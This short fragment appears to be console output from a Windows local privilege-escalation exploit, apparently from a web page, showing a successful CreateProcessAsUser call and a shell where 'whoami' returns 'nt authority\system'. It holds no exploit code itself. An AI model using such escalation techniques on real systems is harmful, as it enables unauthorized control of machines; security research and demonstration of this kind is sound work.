[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Comments